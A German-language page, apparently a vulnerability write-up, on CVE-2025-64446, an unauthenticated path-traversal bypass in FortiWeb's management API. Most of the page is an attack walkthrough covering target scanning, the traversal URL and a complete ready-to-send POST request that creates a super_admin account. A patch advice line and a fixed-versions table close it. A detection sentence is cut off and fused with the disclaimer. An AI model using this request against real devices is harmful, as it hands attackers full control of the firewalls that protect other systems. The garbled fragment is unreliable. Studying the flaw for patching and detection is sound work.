
CVE-2025-64446

Kritische nicht authentifizierte Sicherheitslücke, die es entfernten Angreifern ermöglicht, Administratorkonten auf FortiWeb-Geräten zu erstellen.
CVE-2025-64446 ist eine schwerwiegende relative Pfad-Traversal-Sicherheitslücke in der Verwaltungsoberfläche der FortiWeb Web Application Firewall.
Ein nicht authentifizierter entfernter Angreifer kann diese Schwachstelle ausnutzen, um die Authentifizierung zu umgehen und neue Administratorbenutzer mit vollen Berechtigungen zu erstellen, was zur vollständigen Kompromittierung des Geräts führt.
Empfehlung: Aktualisieren Sie so schnell wie möglich auf die neueste gepatchte Version.
Zielidentifikation
Der Angreifer scannt nach öffentlich zugänglichen FortiWeb-Verwaltungsoberflächen (normalerweise auf HTTPS-Port 443 oder 8443).
Erstellen der bösartigen Anfrage
Kern des Exploits ist eine relative Pfad-Traversal (../) kombiniert mit einer speziell gestalteten URL, die einen internen nicht authentifizierten CGI-Endpunkt erreicht.
Muster des verwundbaren Endpunkts:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
Senden des Exploits
Der Angreifer sendet eine einzelne POST-Anfrage mit JSON-Payload, um ein neues Administratorkonto zu erstellen.
Beispiel-Exploit-Anfrage:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiw eb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
Erfolgreiche Ausnutzung
Im Erfolgsfall erstellt FortiWeb das neue Admin-Konto ohne vorherige Authentifizierung. Der Angreifer kann sich dann mit den neu erstellten Anmeldedaten anmelden und die vollständige Kontrolle über die WAF erlangen.
Die Verwaltungs-API bereinigt den Pfad nicht ordnungsgemäß, sodass die Anfrage zurück zur alten fwbcgi-Binärdatei traversieren kann, die bei bestimmten Vorgängen keine Authentifizierung erzwingt.
fwbcgi, ../ oder ungewöhnliche Admin-Erstellungsversuche enthaltenNur für Bildungs- und defensive Sicherheitsforschungszwecke.
Mit ❤️ für die Cybersicherheits-Community erstellt
Zuletzt aktualisiert: April 2026
| Produkt | Betroffene Versionen | Behoben in Version |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 und höher |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 und höher |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 und höher |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 und höher |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 und höher |